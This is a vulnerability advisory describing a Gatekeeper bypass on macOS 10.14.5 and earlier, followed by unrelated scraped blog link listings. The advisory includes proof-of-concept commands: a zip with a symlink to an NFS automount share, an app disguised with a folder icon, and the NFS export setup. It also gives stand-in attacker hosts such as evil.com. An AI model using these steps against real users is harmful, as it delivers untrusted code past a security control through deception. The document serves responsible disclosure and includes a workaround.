MacOS X GateKeeper Bypass
MacOS X GateKeeper Bypass
OVERVIEW
On MacOS X version <= 10.14.5 (at time of writing) is it possible to easily bypass Gatekeeper in order to
execute untrusted code without any warning or user's explicit permission.
Gatekeeper is a mechanism developed by Apple and included in MacOS X since 2012 that enforces code
signing and verifies downloaded applications before allowing them to run.
For example, if a user donwloads an application from internet and executes it, Gatekeeper will prevent it from
running without user's consens.
DETAILS
As per-design, Gatekeeper considers both external drives and network shares as safe locations and it allows
any application they contain to run.
By combining this design with two legitimate features of MacOS X, it will result in the complete deceivement of
the intended behaviour.
The first legit feature is automount (aka autofs) that allows a user to automatically mount a network share just
by accessing a "special" path, in this case, any path beginning with "/net/".
For example
ls /net/evil-attacker.com/sharedfolder/
will make the os read the content of the 'sharedfolder' on the remote host (evil-attacker.com) using NFS.
The second legit feature is that zip archives can contain symbolic links pointing to an arbitrary location
(including automount enpoints) and that the software on MacOS that is responsible to decompress zip files
do not perform any check on the symlinks before creatig them.
To better understand how this exploit works, let's consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls
(ex Documents -> /net/evil.com/Documents) and sends it to the victim.
The victim downloads the malicious archive, extracts it and follows the symlink.
Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled
executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path
from titlebar) makes this tecnique very effective and hard to spot.
The following video illustrates the concept
PoC
In order to reproduce this issue, follow the steps below:
• create a zip file with a symlink to an automount endpoint
• mkdir Documents
• ln -s /net/linux-vm.local/nfs/Documents Documents/Documents
• zip -ry Documents.zip Documents
• create an application (.app folder) with the code you want to run
• cp -r /Applications/Calculator.app PDF.app
• echo -e '#!/bin/bash'"\n"'open /Applications/iTunes.app' > PDF.app/Contents/MacOS/Calculator
• chmod +x PDF.app/Contents/MacOS/Calculator
• rm PDF.app/Contents/Resources/AppIcon.icns
• ln -s /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/GenericFolderIcon.icns PDF.app/Contents/Resources/AppIcon.icns
• create a publicily accessible NFS share and put the .app in it
• ssh linux-vm.local
• mkdir -p /nfs/Documents
• echo '/nfs/Documents *(insecure,rw,no_root_squash,anonuid=1000,anongid=1000,async,nohide)' >> /etc/exports
• service nfs-kernel-server restart
• scp -r mymac.local:PDF.app /nfs/Documents/
• upload the zip somewhere in internet and download it so it gets the quarantine flag used by Gatekeeper
• extract the zip (if needed) and navigate it
HISTORY
The
vendor has been contacted on February 22th 2019 and it's aware of this
issue. This issue was supposed to be addressed, according t
the vendor, on May 15th 2019 but Apple started dropping my emails.
Since Apple is aware of my 90 days disclosure deadline, I make this information public.
SOLUTION
No solution is available yet.
A possible workaround is to disable automount:
• Edit /etc/auto_master as root
• Comment the line beginning with '/net'
• Reboot
REFERENCES
https://fcvl.net/
https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass
CREDITS
Filippo Cavallarin
filippo.cavallarin@wearesegment.com
MacOS X GateKeeper Bypass的更多相关文章
- APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4,Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra
APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4, Security Update2019-002 High Sierra, Security Update 2019 ...
- VMware15安装MAC(MAC OS 10.13)(OS X 10.14)原版可升级最新可解锁macOS Unlocker3.0(OS X 10.13)
目录树 1.1.2安装环境: 1.1.3所需资源: 1.1.4 Unlocker 3.0解锁 1.1.5 配置环境 1.1.6开始安装 1.1.7开启虚拟机进入MAC安装界面 1.1.8 macO ...
- 安装macOS Sierra后怎么找回“任何来源”选项
安装macOS Sierra后,会发现系统偏好设置的“安全与隐私”中默认已经去除了允许“任何来源”App的选项,无法运行一些第三方应用(提示xx.app已经损坏).如果需要恢复允许“任何来源”的选项, ...
- macOS Sierra 10.12.4 (16E195) - Clover [ 20170403 ]
原文:https://user.qzone.qq.com/753313822/blog/1424460141?_t_=0.48652242555134495 建议使用 1920 * 1080 屏幕分辨 ...
- macOS Sierra 最新系统找回允许任何软件安装
终端输入就可以了 安装macOS Sierra后,会发现系统偏好设置的“安全与隐私”中默认已经去除了允许“任何来源”App的选项,无法运行一些第三方应用. 如果需要恢复允许“任何来源”的选项,即关闭G ...
- 第一篇 HTML5打包APP之VMware15安装MAC(MAC OS 10.13)(OS X 10.14)原版可升级最新可解锁macOS Unlocker3.0(OS X 10.13)
1.1.2安装环境: 1.1.3所需资源: 1.1.4 Unlocker 3.0解锁 1.1.5 配置环境 1.1.6开始安装 1.1.7开启虚拟机进入MAC安装界面 1.1.8 macOS 10.1 ...
- macOS 10.13允许任何来源开启方法
软件下载网站: http://www.pc6.com/ 软件安装问题: macOS 10.13允许任何来源开启方法: 如果需要恢复允许“任何来源”的选项,即关闭系统的Gatekeeper,我们可以在“ ...
- java高版本下各种JNDI Bypass方法复现
目录 0 前言 1 Java高版本JNDI绕过的源代码分析 1.1 思路一的源码分析 1.2 思路二的源码分析 2 基于本地工厂类的利用方法 2.1 org.apache.naming.factory ...
- TODO:macOS编译PHP7.1
TODO:macOS编译PHP7.1 本文主要介绍在macOS上编译PHP7.1,有兴趣的朋友可以去尝试一下. 1.下载PHP7.1源码,建议到PHP官网下载纯净到源码包php-7.1.0.tar.g ...
随机推荐
- mac中matplotlib不支持中文的解决办法
参考:https://blog.csdn.net/kaizei_pao/article/details/80795377 首先查看matplotlib已加载的字体: import matplotlib ...
- asp乱码问题
UTF-8编码的话:在ASP脚本顶部加入<%@Language="vbscript" Codepage="65001"%>以及再在<head& ...
- 算法习题---5.8Unix ls命令(Uva400)
一:题目 输入正整数n以及n个文件名,将这n个文件名按照ASCII优先升序排列,按列优先方式左对齐输出. 注意:文件名最长的为M,那么最右列字符串长度为M,其他列的长度为M+2 注意:一列最多允许出现 ...
- Python数据抓取技术与实战 pdf
Python数据抓取技术与实战 目录 D11章Python基础1.1Python安装1.2安装pip1.3如何查看帮助1.4D1一个实例1.5文件操作1.6循环1.7异常1.8元组1.9列表1.10字 ...
- springboot 整合 Froala Editor 3
springboot项目中使用 Froala Editor 3,参考官网文档:https://www.froala.com/wysiwyg-editor/docs/overview 下载文件后,引入c ...
- LeetCode_389. Find the Difference
389. Find the Difference Easy Given two strings s and t which consist of only lowercase letters. Str ...
- (十三)class文件结构:常量池(转)
Class类文件的结构 全局规范 1.任何一个Class文件都对应着唯一一个类或接口的定义信息,但反过来说,类或接口并不一定都得定义在文件里(譬如类或接口也可以通过类加载器直接生成).本章中,只是通俗 ...
- MongoDB学习笔记一:MongoDB基础
目录 MongoDB是什么? 学了有什么用? MongoDB入门 安装 修改数据库位置 MongoDB的启动方式 MongoDB的图形化工具 MongoDB基本命令 增 查询 更新 删除 排序 投影 ...
- mycat搭建环境
macos完全卸载mysql: https://blog.csdn.net/u012721519/article/details/55002626 踩过的坑: mycat1.6不支持单库分表; 最少要 ...
- pycharm 提示:this license **** has been cancelled(2)
pycharm安装激活过程中,提示 this license **** has been cancelled .这个问题并不是你的激活码不对,而是需要修改系统的hosts文件,下面详细讲解下如何修改h ...